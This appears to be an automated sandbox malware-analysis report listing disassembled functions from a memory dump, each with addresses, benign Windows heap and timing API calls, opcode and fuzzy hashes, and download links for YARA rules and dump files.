Instruction ID: 52fbd4c183aa172b4f688f46a113a303f396d14a14ad30edd7b49537c97f2455
Opcode Fuzzy Hash: cb9f1ba4373fb3b3ec07c67b642b73e6314868ec6e73aa7a80b94533eea9b16b
Instruction Fuzzy Hash: FB115475F4010CABDB10DB59EC45BEEB7BDEB88711F104166FA05F3240D6719E549790

Function 00B75640 Relevance: 10.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000000,?,?,?,?,00B745C1,00000000,00000002), ref: 00B75670
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00000000,00000000,?,?,?,?,00B745C1,00000000,00000002), ref: 00B75693
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,00B745C1,00000000,00000002), ref: 00B756A4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000400,?,?,?,?,?,?,?,?,?,?,?,00B745C1,00000000,00000002), ref: 00B7572A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00B75785
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,00B745C1,00000000,00000002), ref: 00B758B3
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,00B745C1,00000000,00000002), ref: 00B758CB
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,00B745C1,00000000,00000002), ref: 00B758D4

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$malloc
String ID:
API String ID: 2190258309-0
Opcode ID: ecd6f3139c297421340d62eedab93eb67c739a8841a330c22c2bd52c559d998a
Instruction ID: eb1bbdac1fc7d32376e6994118648656d6073faa299f934ad7212be0a5cc4d16
Opcode Fuzzy Hash: ecd6f3139c297421340d62eedab93eb67c739a8841a330c22c2bd52c559d998a
Instruction Fuzzy Hash: 2A91C070A046069FDB25CF59C8907AEBBF1FF49304F1880ADD869A7341DBB1AD46CB91

Function 00A14360 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 373memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A146C1
HeapFree.KERNEL32(00000000,?), ref: 00A14764
HeapFree.KERNEL32(00000000,?), ref: 00A147AA

Strings

NULL, xrefs: 00A143C3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 0125478046ee6eb86edb2b5d16ead451b1998d9d42ef7c35a038c4d54fac9bcb
Instruction ID: 23665cfd8ea8d5254254b228e858186ac577dd115ef6142e2c8b8a59dd96bdf1
Opcode Fuzzy Hash: 0125478046ee6eb86edb2b5d16ead451b1998d9d42ef7c35a038c4d54fac9bcb
Instruction Fuzzy Hash: B0E17071A002599BDB25CF28DC41BE9B7B9AF59304F0441E9E949A7281EB70AEC4CF90

Function 00A202E0 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 368memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A20631
HeapFree.KERNEL32(00000000,?), ref: 00A206D4
HeapFree.KERNEL32(00000000,?), ref: 00A2071A

Strings

NULL, xrefs: 00A20331

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 8c7e5e9061db7f8ce2178b279812b5503b410789062c0ee33363e1ccd750827d
Instruction ID: f95101015d8ec4f0e85525b2c48ec29df42d7f46fee042ded9ea4c9958856d81
Opcode Fuzzy Hash: 8c7e5e9061db7f8ce2178b279812b5503b410789062c0ee33363e1ccd750827d
Instruction Fuzzy Hash: CCE17271A002299FDB25DB24DC45FE9B7B8AF54304F0441F9E949A7242EBB1AEC4CF90

Function 00A1F910 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 368memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A1FC61
HeapFree.KERNEL32(00000000,?), ref: 00A1FD04
HeapFree.KERNEL32(00000000,?), ref: 00A1FD4A

Strings

NULL, xrefs: 00A1F961

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 89c03e618914fd4d875f80fb382d5ab0a2bfcc9fadf266108c85047f86fdec45
Instruction ID: ad98d57d965aaefba292cb779927e6f853b6046a4ce0d88a1eafd8a5c0f5fac9
Opcode Fuzzy Hash: 89c03e618914fd4d875f80fb382d5ab0a2bfcc9fadf266108c85047f86fdec45
Instruction Fuzzy Hash: 92E18171E002599FDB25CB24DC51BE9B7B8AF59344F0442F9E949A7242EB70AEC4CF90

Function 00A14D40 Relevance: 9.4, APIs: 5, Strings: 1, Instructions: 368memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00A15091
HeapFree.KERNEL32(00000000,?), ref: 00A15134
HeapFree.KERNEL32(00000000,?), ref: 00A1517A

Strings

NULL, xrefs: 00A14D91

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 5b7354f6f1d82271f4ee5c46662254d6fad7bc0ccb0d71ffcd38d273dfc7ffb2
Instruction ID: d524e3c38d54c4d3c7802de71b5b6b793e6508603c4feaa76db4d9b308e42a2b
Opcode Fuzzy Hash: 5b7354f6f1d82271f4ee5c46662254d6fad7bc0ccb0d71ffcd38d273dfc7ffb2
Instruction Fuzzy Hash: 30E18371E002199FDB25DF24DC45BEAB7B8AF59304F0442E9E949A7241EB71AEC4CF90

Function 00A19B20 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 266memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A19C92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A19D25
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A19D5D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A19E23
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A19E40

Strings

NULL, xrefs: 00A19B70

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 8d81127e934e8aeeb92eff9d35394ffa633d16c767e565a6d116d5fcba90bda8
Instruction ID: a265e55664eb5530cac58e820b5eb0afb9e081f6d11be6717f16cae9d9dd394b
Opcode Fuzzy Hash: 8d81127e934e8aeeb92eff9d35394ffa633d16c767e565a6d116d5fcba90bda8
Instruction Fuzzy Hash: E3A16D71E00218DFDB20DB75D865BDEB7B8AF45340F144169E949EB382EB31A985CF90

Function 00A22BA0 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 262memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22D12
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22DA5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22DDD
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22E99
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A22EB6

Strings

NULL, xrefs: 00A22BEC

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: 6e849e74bd5d233e4481096049c5b3f26ba9f0dd099d36610c6cb8525cbe2043
Instruction ID: 40ae287ffa20006fdbeeb8596b24d203e6c996f59e408422ebeeb09f13b15869
Opcode Fuzzy Hash: 6e849e74bd5d233e4481096049c5b3f26ba9f0dd099d36610c6cb8525cbe2043
Instruction Fuzzy Hash: 07A18171E402189FDB20DB78EC55B9EBBB8AF45340F144279E809EB392EB319945DF90

Function 00A22EE0 Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 262memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A23052
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A230E5
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A2311D
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A231D9
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A231F6

Strings

NULL, xrefs: 00A22F2C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID: NULL
API String ID: 3298025750-324932091
Opcode ID: fbaf8868ed3ff1780f1f859c5f21686d0437272d4bf09e16ad5e1f16488f7114
Instruction ID: 15db176f6649743b3ad18a04dff5a9cee51294f349e53e3f4cd3b61d74281766
Opcode Fuzzy Hash: fbaf8868ed3ff1780f1f859c5f21686d0437272d4bf09e16ad5e1f16488f7114
Instruction Fuzzy Hash: 15A18031E013189BDF20DB78EC55B9EB7B8AF45340F144269E809EB382EB359A54CF90

Function 00A309D0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 242memorystringCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,E8833124,00000105,00000003,00000000,BBFE6088,00000000), ref: 00A30ACA
HeapFree.KERNEL32(00000000,E8833124,00000105,00000003,00000000,BBFE6088,00000000), ref: 00A30B23
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,E8833124,00008585), ref: 00A30C33
HeapFree.KERNEL32(00000000,00000000,BBFE6088,00000000), ref: 00A30C84
HeapFree.KERNEL32(00000000,00C731C4,BBFE6088,00000000), ref: 00A30CA3

Strings

ENTRY_ASSEMBLY_NAME, xrefs: 00A30B5E, 00A30BBD

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strncpy
String ID: ENTRY_ASSEMBLY_NAME
API String ID: 3654647765-1484239926
Opcode ID: 71c8186d935b1a896291153c3b77adf38ac5eb71caeed6603bd422058ad281ff
Instruction ID: f83b5e4f15d3ceb52c443d886571b8e2ccec4565089fb5225faaf0c21928a94a
Opcode Fuzzy Hash: 71c8186d935b1a896291153c3b77adf38ac5eb71caeed6603bd422058ad281ff
Instruction Fuzzy Hash: E4914971E00305DFDB14CFA9D965BAEBBB5EF88750F184229E815A3390DB759D40CB60

Function 0088CD20 Relevance: 9.2, APIs: 6, Instructions: 221memoryCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,BBFE6088,00000001,00000000,00000000), ref: 0088CDA0
HeapFree.KERNEL32(00000000,?,?), ref: 0088CE38
HeapFree.KERNEL32(00000000,?,?), ref: 0088CE76
HeapFree.KERNEL32(00000000,?), ref: 0088CEF8
HeapFree.KERNEL32(00000000,00000000,BBFE6088,00000001,00DA46E8,0000001F), ref: 0088D192
HeapFree.KERNEL32(00000000,00000000,BBFE6088,00000001,00DA46E8,0000001F), ref: 0088D1BC

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$FromProg
String ID:
API String ID: 1545854226-0
Opcode ID: 37760284fe28017990117982e8f2dafd9283ec20eaaa5ea3f606476407a74f00
Instruction ID: 5358f3871e2a9425e0b54ac6ed506a8ae7f70f8156cba7f03bb7474c39f1f6f3
Opcode Fuzzy Hash: 37760284fe28017990117982e8f2dafd9283ec20eaaa5ea3f606476407a74f00
Instruction Fuzzy Hash: E581A671A00258DBEB20EFA5DC88BAEB7B5FF44710F1042A9E505E7294DB759E44CF90

Function 007DBBC0 Relevance: 9.2, APIs: 6, Instructions: 202COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 007DBCB2
SignalObjectAndWait.KERNEL32(?,?,?,BBFE6088,BBFE6088,0000002C), ref: 007DBCD6
GetTickCount64.KERNEL32 ref: 007DBD2A
GetTickCount64.KERNEL32 ref: 007DBD53
WaitForSingleObjectEx.KERNEL32(?,?,00000001), ref: 007DBD68
GetLastError.KERNEL32 ref: 007DBD81

Part of subcall function 008B4F60: SetEvent.KERNEL32(03426908,03426878,00000001,008B4C54), ref: 008B4FD0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Count64Tick$ObjectWait$ErrorEventLastSignalSingle
String ID:
API String ID: 4086898431-0
Opcode ID: bc38b1aa223fa559770769d79cd2311a738de2eb4626a77d41781fea28f41cb1
Instruction ID: ec96a6404798473e43f5998312eb06831c7fb3d981da3cb43ea8c0159ad939e6
Opcode Fuzzy Hash: bc38b1aa223fa559770769d79cd2311a738de2eb4626a77d41781fea28f41cb1
Instruction Fuzzy Hash: 16818170A00649DFDB24CF68C488BEDBBF1FF08324F15825AE429A7391CB799945CB61

Function 0097EB50 Relevance: 9.2, APIs: 6, Instructions: 182memorystringCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0097ECC3
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 0097ECEE
HeapFree.KERNEL32(00000000,?), ref: 0097ED1E

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 0097ED36
HeapFree.KERNEL32(00000000,?), ref: 0097ED66
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 0097ED94

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strncmpwcsncmp
String ID:
API String ID: 3465112686-0
Opcode ID: ee49f04ccc9af79a91789efdeebe7b7337473f30ed3f6cc97ea9eb08151f3e5b
Instruction ID: 1ae8984288a3e601dea95b943636e7c1803ab4f273e490a6024c282795df2300
Opcode Fuzzy Hash: ee49f04ccc9af79a91789efdeebe7b7337473f30ed3f6cc97ea9eb08151f3e5b
Instruction Fuzzy Hash: E161B131A00619ABDB21DF29DD88BA9B7F9EF48310F1482D8E85D972D0DB75AE40CF40

Function 00A35350 Relevance: 9.2, APIs: 6, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00A3538D
HeapAlloc.KERNEL32(03400000,00000000,0000000C), ref: 00A353AA
HeapFree.KERNEL32(00000000,00000000), ref: 00A35506

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocFreeProcess
String ID:
API String ID: 2113670309-0
Opcode ID: a0f942b9d57cd5b151dccdd7d36f2abbf3f06571b04d623a53f7ad4af486ea57
Instruction ID: 3abd5333742ef0c2062f4cac71468160d1a40fb9245b61160334f5389e41117e
Opcode Fuzzy Hash: a0f942b9d57cd5b151dccdd7d36f2abbf3f06571b04d623a53f7ad4af486ea57
Instruction Fuzzy Hash: 58519C71E00A019BEB249F7DD845B6EBBF6AF84311F148129F815DB391EBB1D940CBA1

Function 00A2C310 Relevance: 9.2, APIs: 6, Instructions: 151memorythreadCOMMON

